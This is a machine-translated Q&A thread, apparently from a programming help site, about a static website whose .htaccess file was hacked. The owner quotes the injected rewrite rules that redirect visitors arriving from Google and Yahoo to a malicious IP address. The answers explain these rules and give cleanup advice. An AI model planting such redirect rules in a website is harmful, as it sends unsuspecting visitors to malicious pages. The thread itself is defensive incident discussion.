我维持无偿服务的网站被黑客攻击,向游戏网站发送了302个网站等.www.rebekahshouse.org。经过我的托管公司的控制面板搜索后,我发现了htaccess文件中的罪魁祸首。
它看起来像这样:
RewriteEngine on
RewriteCond %{HTTP_REFERER} .oogle.com [NC,OR]
RewriteCond %{HTTP_REFERER} .ahoo.com [NC,OR]
RewriteRule .*hxxp://87.248.180.89/topic.html?s=s- [C,L]
(我认为那是C,L;我覆盖了它并尝试在上面重新创建它,可能在这里和那里错过了一块)
无论如何,我用它覆盖了它:
order allow,deny
deny from all
这对我来说有什么用吗?我的.htaccess文件中应该包含什么内容?这纯粹是一个静态的HTML网站。
谢谢!
答案 0 :(得分:9)
如果您正在运行静态网站,则很可能您的.htaccess中不需要任何内容。 然后你应该锻炼你的网站实际上是如何被黑客攻击的......好像你还没有解决它会再次发生。
答案 1 :(得分:5)
你真正关心的应该是它最初是如何发生的。 Defacers等经常会回来,并会在以前破解的网站上再次尝试相同的事情,因为很多时候漏洞都没有修复。
答案 2 :(得分:5)
htaccess文件是偶然的。你被一个俄罗斯恶意软件团伙攻击了。如果你没有关闭允许黑客攻击的漏洞,那么你将再次被黑客入侵。
服务器本身完全有可能受到攻击,而且你不知道有更多的内容,例如木马软件可能不仅会破坏你的网站,还会对其他人发起攻击,发送垃圾邮件,以及等等。假设对包含htaccess文件的目录具有适当的权限,即使您有一个不安全的Web应用程序,也不可能在那里写入文件。当然,如果您只处理静态文件,那么这个文件可以通过您的上传帐户或服务器本身受到损害的唯一方式。
如果它是您的服务器,因为我猜测它会响应IP地址的直接查询,您需要将其展平并重新安装最新软件,使用新密码并检查您自己的客户端你上传的机器是为了感染。
答案 3 :(得分:2)
(根据@ YGomez的评论:首先,你需要关闭允许创建.htaccess文件的漏洞,否则恶意软件几乎会立即回来;我可能应该明确提到这一点)
第一部分会将所有来自雅虎和谷歌的访问者重定向到87.248.180.89
第二部分(“允许,拒绝”)将拒绝为每个人访问您的网站。
我建议只删除.htaccess并完成它 - 如果你使用.htaccess文件,你会知道那里有什么,否则你不需要它。
答案 4 :(得分:0)
不,那对你没有任何帮助。对于静态站点,您可能根本不需要.htaccess文件。
答案 5 :(得分:0)
记住不要在FTP客户端中保存FTP密码。
如果您怀疑系统已被感染,请格式化并安装操作系统,然后安装一个好的防病毒+防火墙。我建议使用Avast免费版和Comodo防火墙。
我们收到了很多查询,我们清理了那些受感染的网站。